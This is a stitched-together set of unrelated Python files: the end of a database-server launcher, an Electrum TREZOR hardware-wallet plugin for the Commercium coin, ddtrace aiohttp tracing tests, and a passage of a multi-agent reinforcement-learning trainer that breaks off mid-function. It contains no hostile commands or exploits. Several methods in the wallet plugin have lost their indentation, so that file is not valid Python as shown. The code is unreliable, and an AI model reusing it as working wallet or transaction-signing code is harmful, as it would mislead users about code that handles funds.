# wrapper around run_server above.
run_server.arg('dbpath', 'dbpath')
run_server.arg('dbhostport', 'dbhost:port')
run_server.arg('logfile', 'log file')
run_server.opt('loglevel', 'WARN or INFO')
if __name__ == '__main__':
    if hasattr(os, 'fork') and not config.dbserver.multi_user:
        # needed for https://github.com/gem/oq-engine/issues/3211
        # but only if multi_user = False, otherwise init/supervisor
        # will loose control of the process
        detach_process()
    # parse the command line and invoke run_server
    run_server.callfunc()
|
trezor.py | import threading
from binascii import hexlify, unhexlify
from electrum.util import bfh, bh2u, versiontuple
from electrum.bitcoin import (b58_address_to_hash160, xpub_from_pubkey,
TYPE_ADDRESS, TYPE_SCRIPT)
from electrum import constants
from electrum.i18n import _
from electrum.plugins import BasePlugin, Device
from electrum.transaction import deserialize
from electrum.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from ..hw_wallet import HW_PluginBase
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)

# script "generation": which script flavour the keystore derives (legacy
# P2PKH, P2SH-wrapped segwit, or native segwit), decided from the
# derivation-path prefix in TrezorKeyStore.get_script_gen().
SCRIPT_GEN_LEGACY, SCRIPT_GEN_P2SH_SEGWIT, SCRIPT_GEN_NATIVE_SEGWIT = range(0, 3)
class TrezorKeyStore(Hardware_KeyStore):
    """Keystore backed by a TREZOR hardware device."""
    hw_type = 'trezor'
    device = 'TREZOR'

    def get_derivation(self):
        # BIP32 derivation path prefix of this keystore (e.g. "m/44'/0'/0'")
        return self.derivation

    def get_script_gen(self):
        """Map the derivation prefix to a script generation:
        m/49' -> p2sh-segwit, m/84' -> native segwit, anything else legacy."""
        def is_p2sh_segwit():
            return self.derivation.startswith("m/49'/")

        def is_native_segwit():
            return self.derivation.startswith("m/84'/")

        if is_native_segwit():
            return SCRIPT_GEN_NATIVE_SEGWIT
        elif is_p2sh_segwit():
            return SCRIPT_GEN_P2SH_SEGWIT
        else:
            return SCRIPT_GEN_LEGACY

    def get_client(self, force_pair=True):
        return self.plugin.get_client(self, force_pair)

    def decrypt_message(self, sequence, message, password):
        raise RuntimeError(_('Encryption and decryption are not implemented by {}').format(self.device))

    def sign_message(self, sequence, message, password):
        """Sign *message* with the key at <derivation>/<change>/<index>."""
        client = self.get_client()
        address_path = self.get_derivation() + "/%d/%d"%sequence
        address_n = client.expand_path(address_path)
        msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
        return msg_sig.signature

    def sign_transaction(self, tx, password):
        """Collect previous txns and xpub paths, then delegate to the plugin."""
        if tx.is_complete():
            return
        # previous transactions used as inputs
        prev_tx = {}
        # path of the xpubs that are involved
        xpub_path = {}
        for txin in tx.inputs():
            pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
            tx_hash = txin['prevout_hash']
            prev_tx[tx_hash] = txin['prev_tx']
            for x_pubkey in x_pubkeys:
                if not is_xpubkey(x_pubkey):
                    continue
                xpub, s = parse_xpubkey(x_pubkey)
                if xpub == self.get_master_public_key():
                    xpub_path[xpub] = self.get_derivation()
        self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class TrezorPlugin(HW_PluginBase):
    # Derived classes provide:
    #
    #  class-static variables: client_class, firmware_URL, handler_class,
    #     libraries_available, libraries_URL, minimum_firmware,
    #     wallet_class, ckd_public, types

    firmware_URL = 'https://wallet.trezor.io'
    libraries_URL = 'https://github.com/trezor/python-trezor'
    minimum_firmware = (1, 5, 2)   # oldest device firmware accepted
    keystore_class = TrezorKeyStore
    minimum_library = (0, 9, 0)    # oldest python-trezor accepted
    MAX_LABEL_LEN = 32             # device label length limit
    def __init__(self, parent, config, name):
        """Probe for a usable python-trezor library; on success wire up the
        transport layer and register the device enumerator."""
        HW_PluginBase.__init__(self, parent, config, name)
        self.main_thread = threading.current_thread()

        try:
            # Minimal test if python-trezor is installed
            import trezorlib
            try:
                library_version = trezorlib.__version__
            except AttributeError:
                # python-trezor only introduced __version__ in 0.9.0
                library_version = 'unknown'
            if library_version == 'unknown' or \
                    versiontuple(library_version) < self.minimum_library:
                self.libraries_available_message = (
                        _("Library version for '{}' is too old.").format(name)
                        + '\nInstalled: {}, Needed: {}'
                        .format(library_version, self.minimum_library))
                self.print_stderr(self.libraries_available_message)
                raise ImportError()
            self.libraries_available = True
        except ImportError:
            # Plugin stays loaded but inert when trezorlib is missing/too old.
            self.libraries_available = False
            return

        from . import client
        from . import transport
        import trezorlib.ckd_public
        import trezorlib.messages
        self.client_class = client.TrezorClient
        self.ckd_public = trezorlib.ckd_public
        self.types = trezorlib.messages
        self.DEVICE_IDS = ('TREZOR',)

        self.transport_handler = transport.TrezorTransport()
        self.device_manager().register_enumerate_func(self.enumerate)
def enumerate(self):
devices = self.transport_handler.enumerate_devices()
return [Device(d.get_path(), -1, d.get_path(), 'TREZOR', 0) for d in devices]
    def create_client(self, device, handler):
        """Open a transport to *device* and return a sanity-checked client,
        or None when the connection, ping, or firmware check fails."""
        try:
            self.print_error("connecting to device at", device.path)
            transport = self.transport_handler.get_transport(device.path)
        except BaseException as e:
            self.print_error("cannot connect at", device.path, str(e))
            return None

        if not transport:
            self.print_error("cannot connect at", device.path)
            return

        self.print_error("connected to device at", device.path)
        client = self.client_class(transport, handler, self)

        # Try a ping for device sanity
        try:
            client.ping('t')
        except BaseException as e:
            self.print_error("ping failed", str(e))
            return None

        if not client.atleast_version(*self.minimum_firmware):
            msg = (_('Outdated {} firmware for device labelled {}. Please '
                     'download the updated firmware from {}')
                   .format(self.device, client.label(), self.firmware_URL))
            self.print_error(msg)
            handler.show_error(msg)
            return None

        return client
    def get_client(self, keystore, force_pair=True):
        """Return the (possibly cached) client paired with *keystore*."""
        devmgr = self.device_manager()
        handler = keystore.handler
        with devmgr.hid_lock:
            client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
        # returns the client for a given keystore. can use xpub
        if client:
            client.used()
        return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Commercium"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, self.device)
t = threading.Thread(target = self._initialize_device, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
wizard.loop.exec_()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
    def _initialize_device(self, settings, method, device_id, wizard, handler):
        """Run the actual device initialization (on a worker thread) and
        wake the wizard's event loop when done."""
        item, label, pin_protection, passphrase_protection = settings

        if method == TIM_RECOVER:
            # FIXME the PIN prompt will appear over this message
            # which makes this unreadable
            handler.show_error(_(
                "You will be asked to enter 24 words regardless of your "
                "seed's actual length. If you enter a word incorrectly or "
                "misspell it, you cannot change it or go back - you will need "
                "to start again from the beginning.\n\nSo please enter "
                "the words carefully!"))

        language = 'english'
        devmgr = self.device_manager()
        client = devmgr.client_by_id(device_id)

        if method == TIM_NEW:
            strength = 64 * (item + 2)  # 128, 192 or 256
            u2f_counter = 0
            skip_backup = False
            client.reset_device(True, strength, passphrase_protection,
                                pin_protection, label, language,
                                u2f_counter, skip_backup)
        elif method == TIM_RECOVER:
            word_count = 6 * (item + 2)  # 12, 18 or 24
            client.step = 0
            client.recovery_device(word_count, passphrase_protection,
                                   pin_protection, label, language)
        elif method == TIM_MNEMONIC:
            pin = pin_protection  # It's the pin, not a boolean
            client.load_device_by_mnemonic(str(item), pin,
                                           passphrase_protection,
                                           label, language)
        else:
            pin = pin_protection  # It's the pin, not a boolean
            client.load_device_by_xprv(item, pin, passphrase_protection,
                                       label, language)
        # Unblock wizard.loop.exec_() in initialize_device.
        wizard.loop.exit(0)
    def setup_device(self, device_info, wizard, purpose):
        """Pair a client with the wizard and ensure the device is initialized."""
        devmgr = self.device_manager()
        device_id = device_info.device.id_
        client = devmgr.client_by_id(device_id)
        # fixme: we should use: client.handler = wizard
        client.handler = self.create_handler(wizard)
        if not device_info.initialized:
            self.initialize_device(device_id, wizard, client.handler)
        # Fetching an xpub forces the pairing/PIN flow to happen now.
        client.get_xpub('m', 'standard')
        client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
    def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
        """Sign *tx* on the device and merge the signatures back into it.

        prev_tx/xpub_path are stashed on self because trezorlib fetches
        previous transactions back through get_tx() (via tx_api).
        """
        self.prev_tx = prev_tx
        self.xpub_path = xpub_path
        client = self.get_client(keystore)
        inputs = self.tx_inputs(tx, True, keystore.get_script_gen())
        outputs = self.tx_outputs(keystore.get_derivation(), tx, keystore.get_script_gen())
        # sign_tx returns (signatures, serialized_tx); we need the raw tx.
        signed_tx = client.sign_tx(self.get_coin_name(), inputs, outputs, lock_time=tx.locktime)[1]
        raw = bh2u(signed_tx)
        tx.update_signatures(raw)
    def show_address(self, wallet, keystore, address):
        """Display *address* on the device screen for visual verification.

        Single-sig wallets pick the script type from the keystore's
        derivation; multisig wallets additionally send the redeem-script
        description so the device can reconstruct the address.
        """
        client = self.get_client(keystore)
        if not client.atleast_version(1, 3):
            keystore.handler.show_error(_("Your device firmware is too old"))
            return
        change, index = wallet.get_address_index(address)
        derivation = keystore.derivation
        address_path = "%s/%d/%d"%(derivation, change, index)
        address_n = client.expand_path(address_path)
        xpubs = wallet.get_master_public_keys()
        if len(xpubs) == 1:
            script_gen = keystore.get_script_gen()
            if script_gen == SCRIPT_GEN_NATIVE_SEGWIT:
                script_type = self.types.InputScriptType.SPENDWITNESS
            elif script_gen == SCRIPT_GEN_P2SH_SEGWIT:
                script_type = self.types.InputScriptType.SPENDP2SHWITNESS
            else:
                script_type = self.types.InputScriptType.SPENDADDRESS
            client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
        else:
            def f(xpub):
                node = self.ckd_public.deserialize(xpub)
                return self.types.HDNodePathType(node=node, address_n=[change, index])
            pubkeys = wallet.get_public_keys(address)
            # sort xpubs using the order of pubkeys
            sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
            pubkeys = list(map(f, sorted_xpubs))
            multisig = self.types.MultisigRedeemScriptType(
                pubkeys=pubkeys,
                signatures=[b''] * wallet.n,
                m=wallet.m,
            )
            client.get_address(self.get_coin_name(), address_n, True, multisig=multisig)
def tx_inputs(self, tx, for_sig=False, script_gen=SCRIPT_GEN_LEGACY):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = "\0"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
if script_gen == SCRIPT_GEN_NATIVE_SEGWIT:
txinputtype.script_type = self.types.InputScriptType.SPENDWITNESS
elif script_gen == SCRIPT_GEN_P2SH_SEGWIT:
txinputtype.script_type = self.types.InputScriptType.SPENDP2SHWITNESS
else:
txinputtype.script_type = self.types.InputScriptType.SPENDADDRESS
else:
def f(x_pubkey):
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
else:
xpub = xpub_from_pubkey(0, bfh(x_pubkey))
s = []
node = self.ckd_public.deserialize(xpub)
return self.types.HDNodePathType(node=node, address_n=s)
pubkeys = list(map(f, x_pubkeys))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=list(map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures'))),
m=txin.get('num_sig'),
)
if script_gen == SCRIPT_GEN_NATIVE_SEGWIT:
script_type = self.types.InputScriptType.SPENDWITNESS
elif script_gen == SCRIPT_GEN_P2SH_SEGWIT:
script_type = self.types.InputScriptType.SPENDP2SHWITNESS
else:
script_type = self.types.InputScriptType.SPENDMULTISIG
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if 'scriptSig' in txin:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
    def tx_outputs(self, derivation, tx, script_gen=SCRIPT_GEN_LEGACY):
        """Convert electrum tx outputs into trezorlib TxOutputType messages.

        At most one change output (tx.output_info entry) is described by
        derivation path instead of by address, so the device can hide it
        from the confirmation screen.
        """

        def create_output_by_derivation(info):
            # Output belonging to this wallet: describe it by path so the
            # device recognizes it as change.
            index, xpubs, m = info
            if len(xpubs) == 1:
                if script_gen == SCRIPT_GEN_NATIVE_SEGWIT:
                    script_type = self.types.OutputScriptType.PAYTOWITNESS
                elif script_gen == SCRIPT_GEN_P2SH_SEGWIT:
                    script_type = self.types.OutputScriptType.PAYTOP2SHWITNESS
                else:
                    script_type = self.types.OutputScriptType.PAYTOADDRESS
                address_n = self.client_class.expand_path(derivation + "/%d/%d" % index)
                txoutputtype = self.types.TxOutputType(
                    amount=amount,
                    script_type=script_type,
                    address_n=address_n,
                )
            else:
                if script_gen == SCRIPT_GEN_NATIVE_SEGWIT:
                    script_type = self.types.OutputScriptType.PAYTOWITNESS
                elif script_gen == SCRIPT_GEN_P2SH_SEGWIT:
                    script_type = self.types.OutputScriptType.PAYTOP2SHWITNESS
                else:
                    script_type = self.types.OutputScriptType.PAYTOMULTISIG
                address_n = self.client_class.expand_path("/%d/%d" % index)
                nodes = map(self.ckd_public.deserialize, xpubs)
                pubkeys = [self.types.HDNodePathType(node=node, address_n=address_n) for node in nodes]
                multisig = self.types.MultisigRedeemScriptType(
                    pubkeys=pubkeys,
                    signatures=[b''] * len(pubkeys),
                    m=m)
                txoutputtype = self.types.TxOutputType(
                    multisig=multisig,
                    amount=amount,
                    address_n=self.client_class.expand_path(derivation + "/%d/%d" % index),
                    script_type=script_type)
            return txoutputtype

        def create_output_by_address():
            # External output (or wallet output shown to the user): describe
            # it by address / OP_RETURN payload.
            txoutputtype = self.types.TxOutputType()
            txoutputtype.amount = amount
            if _type == TYPE_SCRIPT:
                txoutputtype.script_type = self.types.OutputScriptType.PAYTOOPRETURN
                txoutputtype.op_return_data = address[2:]
            elif _type == TYPE_ADDRESS:
                txoutputtype.script_type = self.types.OutputScriptType.PAYTOADDRESS
                txoutputtype.address = address
            return txoutputtype

        def is_any_output_on_change_branch():
            # index[0] == 1 means the .../1/i (change) branch of the wallet.
            for _type, address, amount in tx.outputs():
                info = tx.output_info.get(address)
                if info is not None:
                    index, xpubs, m = info
                    if index[0] == 1:
                        return True
            return False

        outputs = []
        has_change = False
        any_output_on_change_branch = is_any_output_on_change_branch()

        for _type, address, amount in tx.outputs():
            use_create_by_derivation = False
            info = tx.output_info.get(address)
            if info is not None and not has_change:
                index, xpubs, m = info
                on_change_branch = index[0] == 1
                # prioritise hiding outputs on the 'change' branch from user
                # because no more than one change address allowed
                # note: ^ restriction can be removed once we require fw
                # that has https://github.com/trezor/trezor-mcu/pull/306
                if on_change_branch == any_output_on_change_branch:
                    use_create_by_derivation = True
                    has_change = True
            if use_create_by_derivation:
                txoutputtype = create_output_by_derivation(info)
            else:
                txoutputtype = create_output_by_address()
            outputs.append(txoutputtype)

        return outputs
def electrum_tx_to_txtype(self, tx):
    """Convert an Electrum transaction into a trezorlib TransactionType.

    A None input yields an empty TransactionType (segwit inputs do not
    require the previous transaction).
    """
    txtype = self.types.TransactionType()
    if tx is None:
        # probably for segwit input and we don't need this prev txn
        return txtype
    parsed = deserialize(tx.raw)
    txtype.version = parsed['version']
    txtype.lock_time = parsed['lockTime']
    txtype._extend_inputs(self.tx_inputs(tx))
    for vout in parsed['outputs']:
        bin_output = txtype._add_bin_outputs()
        bin_output.amount = vout['value']
        bin_output.script_pubkey = bfh(vout['scriptPubKey'])
    return txtype
def get_tx(self, tx_hash):
    """Return the previous transaction for `tx_hash` in trezorlib form.

    Called back from the trezor libraries (via tx_api); raises KeyError
    if the hash is not in the prev-tx cache.
    """
    cached = self.prev_tx[tx_hash]
    return self.electrum_tx_to_txtype(cached)
|
test_request.py | import asyncio
import threading
from urllib import request
import aiohttp_jinja2
import pytest
from ddtrace import config
from ddtrace.contrib.aiohttp.middlewares import trace_app
from ddtrace.contrib.aiohttp.patch import patch
from ddtrace.contrib.aiohttp.patch import unpatch
from ddtrace.pin import Pin
from tests.utils import assert_is_measured
from tests.utils import override_global_config
from .app.web import setup_app
async def test_full_request(patched_app_tracer, aiohttp_client, loop):
    """A handler hit creates a root request span and a child template span
    with the expected service/name/resource tags."""
    app, tracer = patched_app_tracer
    client = await aiohttp_client(app)
    response = await client.request("GET", "/template/")
    assert response.status == 200
    await response.text()
    # exactly one trace containing the request span and the template span
    traces = tracer.pop_traces()
    assert len(traces) == 1
    assert len(traces[0]) == 2
    request_span, template_span = traces[0]
    assert_is_measured(request_span)
    # request span
    assert request_span.service == "aiohttp-web"
    assert request_span.name == "aiohttp.request"
    assert request_span.resource == "GET /template/"
    # template span
    assert template_span.service == "aiohttp-web"
    assert template_span.name == "aiohttp.template"
    assert template_span.resource == "aiohttp.template"
async def test_multiple_full_request(patched_app_tracer, aiohttp_client, loop):
    """Many blocking requests issued from worker threads are each traced
    while sharing one event loop."""
    app, tracer = patched_app_tracer
    client = await aiohttp_client(app)

    def fetch_delayed():
        # blocking call executed in a worker thread
        url = str(client.make_url("/delayed/"))
        body = request.urlopen(url).read().decode("utf-8")
        assert body == "Done"

    workers = [threading.Thread(target=fetch_delayed, daemon=True) for _ in range(10)]
    for worker in workers:
        worker.start()
    # yield so this loop can serve the threads' requests
    await asyncio.sleep(0.5)
    for worker in workers:
        worker.join(timeout=0.5)
    traces = tracer.pop_traces()
    assert len(traces) == 10
    assert len(traces[0]) == 1
async def test_user_specified_service(tracer, aiohttp_client, loop):
    """
    When a service name is specified by the user
    The aiohttp integration should use it as the service name
    """
    unpatch()
    with override_global_config(dict(service="mysvc")):
        patch()
        app = setup_app()
        trace_app(app, tracer)
        Pin.override(aiohttp_jinja2, tracer=tracer)
        client = await aiohttp_client(app)
        response = await client.request("GET", "/template/")
        await response.text()
        traces = tracer.pop_traces()
        assert len(traces) == 1
        spans = traces[0]
        assert len(spans) == 2
        root_span, render_span = spans
        # both the request span and the template span carry the user service
        assert root_span.service == "mysvc"
        assert render_span.service == "mysvc"
async def test_http_request_header_tracing(patched_app_tracer, aiohttp_client, loop):
    """Whitelisted request headers are recorded as tags on the request span."""
    app, tracer = patched_app_tracer
    client = await aiohttp_client(app)
    config.aiohttp.http.trace_headers(["my-header"])
    response = await client.request("GET", "/", headers={"my-header": "my_value"})
    await response.text()
    traces = tracer.pop_traces()
    assert len(traces) == 1
    spans = traces[0]
    assert len(spans) == 1
    root_span = spans[0]
    assert root_span.service == "aiohttp-web"
    assert root_span.get_tag("http.request.headers.my-header") == "my_value"
async def test_http_response_header_tracing(patched_app_tracer, aiohttp_client, loop):
    """Whitelisted response headers are recorded as tags on the request span."""
    app, tracer = patched_app_tracer
    client = await aiohttp_client(app)
    config.aiohttp.http.trace_headers(["my-response-header"])
    response = await client.request("GET", "/response_headers/")
    await response.text()
    traces = tracer.pop_traces()
    assert len(traces) == 1
    spans = traces[0]
    assert len(spans) == 1
    root_span = spans[0]
    assert root_span.service == "aiohttp-web"
    assert root_span.get_tag("http.response.headers.my-response-header") == "my_response_value"
def test_raise_exception_on_misconfigured_integration(mocker):
    """Importing the aiohttp patch module surfaces a clear error when
    aiohttp_jinja2 cannot be imported.

    Fixes over the previous version:
    * ``mocker.patch`` applies the patch immediately (and undoes it at test
      teardown); it returns a MagicMock, so wrapping it in ``with`` was a
      no-op and misleading.
    * ``e.value`` is the exception *instance*; the message must be compared
      against ``str(e.value)`` — the old ``error_msg == e.value`` was always
      False.
    """
    error_msg = "aiohttp_jinja2 could not be imported and will not be instrumented."
    original__import__ = __import__

    def mock_import(name, *args):
        # fail only the aiohttp_jinja2 import; delegate everything else
        if name == "aiohttp_jinja2":
            raise Exception(error_msg)
        return original__import__(name, *args)

    mocker.patch("builtins.__import__", side_effect=mock_import)
    with pytest.raises(Exception) as e:
        __import__("ddtrace.contrib.aiohttp.patch")
    assert error_msg == str(e.value)
|
trainer_adv.py | # Copyright 2019
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import os.path as osp
import random
import numpy as np
import tensorflow as tf
import string
import pickle
import argparse
import pdb
from copy import deepcopy
import os
import pandas as pd
import git
from multiprocessing import Process
import multiprocessing as mult
import time
import q_agent as qa
import agent_data
from dqn_utils import *
import env_adv as envim
def RMSPropOptimizer(learning_rate=5e-4, momentum=0.05):
    """Return an OptimizerSpec for tf.train.RMSPropOptimizer with a constant LR."""
    schedule = ConstantSchedule(learning_rate)
    return qa.OptimizerSpec(
        constructor=tf.train.RMSPropOptimizer,
        lr_schedule=schedule,
        kwargs=dict(momentum=momentum),
    )
def AdamOptimizer(learning_rate=1e-3):
    """Return an OptimizerSpec for tf.train.AdamOptimizer with a constant LR."""
    schedule = ConstantSchedule(learning_rate)
    return qa.OptimizerSpec(
        constructor=tf.train.AdamOptimizer,
        lr_schedule=schedule,
        kwargs=dict(),
    )
def piecewise_exploration_schedule(num_timesteps, limit_rate=0.02):
    """Anneal exploration linearly from 0.1 to limit_rate over the first
    10% of num_timesteps, then hold at limit_rate."""
    knots = [
        (0, 0.1),
        (num_timesteps * 0.1, limit_rate),
    ]
    return PiecewiseSchedule(knots, outside_value=limit_rate)
def constant_exploration_schedule(constant_rate=0.05):
    """Return a schedule that keeps the exploration rate fixed at constant_rate."""
    return ConstantSchedule(constant_rate)
def id_generator(size=6, chars=string.ascii_uppercase + string.digits):
    """Return a random run identifier of `size` characters drawn from `chars`.

    Not security-sensitive: uses the module-level `random` RNG so runs are
    reproducible under set_global_seeds.
    """
    picks = [random.choice(chars) for _ in range(size)]
    return ''.join(picks)
def set_global_seeds(i):
    """Seed TensorFlow, NumPy and Python's stdlib RNGs for reproducibility."""
    tf.set_random_seed(i)
    np.random.seed(i)
    random.seed(i)
def get_session():
    """Reset the default TF graph and return a fresh Session bound to it."""
    tf.reset_default_graph()
    session = tf.Session()
    return session
class logger(object):
    """Accumulates per-agent-type training metrics, periodically printing a
    summary and pickling all raw logs to `log_file`.

    Fix: `log_type` previously filtered `agents` by type and then indexed
    `errors`/`grad_norms`/`qval_trains`/`qval_targets` with the *filtered*
    position, although those lists are ordered by the FULL agent list (see
    run_episode). With mixed citizen/attacker populations the stats were
    paired with the wrong agents; original indices are now preserved.
    """

    def __init__(self, average_window, print_every,
                 log_file, agent_types):
        self.agent_types = agent_types
        # raw per-iteration logs, keyed by agent type
        self.episode_rewards = self.make_log_dict()
        self.terminal_rewards = self.make_log_dict()
        self.bellman_errors = self.make_log_dict()
        self.grad_norm_min_logs = self.make_log_dict()
        self.grad_norm_max_logs = self.make_log_dict()
        self.qval_trains_log = self.make_log_dict()
        self.qval_targets_log = self.make_log_dict()
        # rolling means over the last `average_window` iterations
        self.mean_episode_reward = self.make_log_dict()
        self.mean_terminal_reward = self.make_log_dict()
        self.mean_bellman_errors = self.make_log_dict()
        # test-time metrics (filled via test_log)
        self.test_rewards = self.make_log_dict()
        self.test_action_signal_corr = self.make_log_dict()
        self.test_action_accuracy = self.make_log_dict()
        self.average_window = average_window
        self.print_every = print_every
        self.log_file = log_file

    def make_log_dict(self):
        """Return a fresh {agent_type: []} mapping for every known type."""
        d = {}
        for t in self.agent_types:
            d[t] = []
        return d

    def log_type(self, a_type, agents, errors, grad_norms, qval_trains, qval_targets,
                 total_time, q_agents, iteration, args):
        """Aggregate one iteration's stats for agents of type `a_type`.

        `errors`, `grad_norms`, `qval_trains` and `qval_targets` are indexed
        by position in the FULL `agents` list, so the original index is kept
        alongside each filtered agent.
        """
        typed = [(orig_i, a) for orig_i, a in enumerate(agents) if a.a_type == a_type]
        n_t_agents = len(typed)
        rewards = np.zeros((
            n_t_agents, args.T, args.n_batches
        ))
        error_a = np.zeros((
            n_t_agents, args.n_batches
        ))
        grad_norms_min = np.zeros((
            n_t_agents, 1
        ))
        grad_norms_max = np.zeros((
            n_t_agents, 1
        ))
        qval_trains_l = np.zeros((
            n_t_agents, 2
        ))
        qval_targets_l = np.zeros((
            n_t_agents, 2
        ))
        for i, (orig_i, a) in enumerate(typed):
            error_a[i, :] = errors[orig_i]
            for t in range(args.T):
                rewards[i, t, :] = a.rewards[t]
            grad_norms_min[i, 0] = np.min(grad_norms[orig_i])
            grad_norms_max[i, 0] = np.max(grad_norms[orig_i])
            qval_trains_l[i, :] = qval_trains[orig_i][0, :]
            qval_targets_l[i, :] = qval_targets[orig_i][0, :]
        m_reward = np.mean(rewards)
        m_reward_terminal = np.mean(rewards[:, -1, :])
        m_errors = np.mean(error_a)
        self.episode_rewards[a_type].append(m_reward)
        self.terminal_rewards[a_type].append(m_reward_terminal)
        self.bellman_errors[a_type].append(m_errors)
        self.grad_norm_min_logs[a_type].append(grad_norms_min)
        self.grad_norm_max_logs[a_type].append(grad_norms_max)
        self.qval_trains_log[a_type].append(qval_trains_l)
        self.qval_targets_log[a_type].append(qval_targets_l)
        if (
            len(self.episode_rewards[a_type]) % self.average_window == 0 and
            len(self.episode_rewards[a_type]) != 0
        ):
            # refresh rolling means once per window
            self.mean_episode_reward[a_type].append(
                np.mean(self.episode_rewards[a_type][-self.average_window:])
            )
            self.mean_terminal_reward[a_type].append(
                np.mean(self.terminal_rewards[a_type][-self.average_window:])
            )
            self.mean_bellman_errors[a_type].append(
                np.mean(self.bellman_errors[a_type][-self.average_window:])
            )

    def log(self, agents, errors, grad_norms, qval_trains, qval_targets,
            total_time, q_agents, iteration, args):
        """Log one training iteration for every agent type present, printing
        a summary and pickling all logs every `print_every` iterations."""
        a_types = list(set([a.a_type for a in agents]))
        for a_type in a_types:
            self.log_type(a_type, agents, errors, grad_norms, qval_trains, qval_targets,
                          total_time, q_agents, iteration, args)
        if iteration % self.print_every == 0 and iteration != 0:
            # q_agents may be a single agent or a per-type dict
            if not isinstance(q_agents, dict):
                learning_rate = q_agents.optimizer_spec.lr_schedule.value(
                    total_time)
                exploration_rate = q_agents.exploration.value(total_time)
            else:
                learning_rate = list(q_agents.values())[0].optimizer_spec.lr_schedule.value(
                    total_time)
                exploration_rate = list(q_agents.values())[0].exploration.value(total_time)
            print('Iteration %d' % iteration)
            for a_type in a_types:
                print('mean reward of type %s (%d episodes) %f' % (
                    a_type, self.average_window, self.mean_episode_reward[a_type][-1]))
                print('mean terminal reward of type %s (%d episodes) %f' % (
                    a_type, self.average_window, self.mean_terminal_reward[a_type][-1]
                ))
                print('mean bellman error of type %s (%d episodes) %f' % (
                    a_type, self.average_window, self.mean_bellman_errors[a_type][-1]
                ))
            print('Learning rate %f' % learning_rate)
            print('Exploration rate %f' % exploration_rate)
            with open(self.log_file, 'wb') as f:
                pickle.dump([
                    self.episode_rewards, self.terminal_rewards, self.bellman_errors,
                    self.grad_norm_min_logs, self.grad_norm_max_logs,
                    self.qval_trains_log, self.qval_targets_log,
                    self.test_rewards, self.test_action_signal_corr, self.test_action_accuracy
                ], f, pickle.HIGHEST_PROTOCOL)

    def test_log(self, test_reward, action_signal_correlation, accuracy):
        """Record test-time reward, action/signal correlation and accuracy
        for each agent type present in `test_reward`."""
        for a_type in test_reward:
            self.test_rewards[a_type].append(test_reward[a_type])
            self.test_action_signal_corr[a_type].append(
                action_signal_correlation[a_type]
            )
            self.test_action_accuracy[a_type].append(
                accuracy[a_type]
            )
def make_csv_log(rews, arec, env, save_path, fname):
    """Flatten per-step rewards/actions plus env state into a tidy CSV.

    Writes one row per (t, agent, batch) with columns:
    batch, t, agent, world, attack_mode, attack, bias, signal, action, reward.
    """
    n_steps = len(rews)
    n_agents = len(rews[0])
    n_batches = rews[0][0].shape[0]
    columns = ('batch', 't', 'agent', 'world', 'attack_mode',
               'attack', 'bias', 'signal', 'action', 'reward')
    rows = {name: [] for name in columns}
    for t in range(n_steps):
        for a in range(n_agents):
            for b in range(n_batches):
                if env.attack:
                    under_attack = 1 if a in env.attack_idx[b, :] else 0
                    attack_mode = 1
                else:
                    under_attack = 0
                    attack_mode = 0
                rows['t'].append(t)
                rows['batch'].append(b)
                rows['agent'].append(a)
                rows['world'].append(env.world[b, 0])
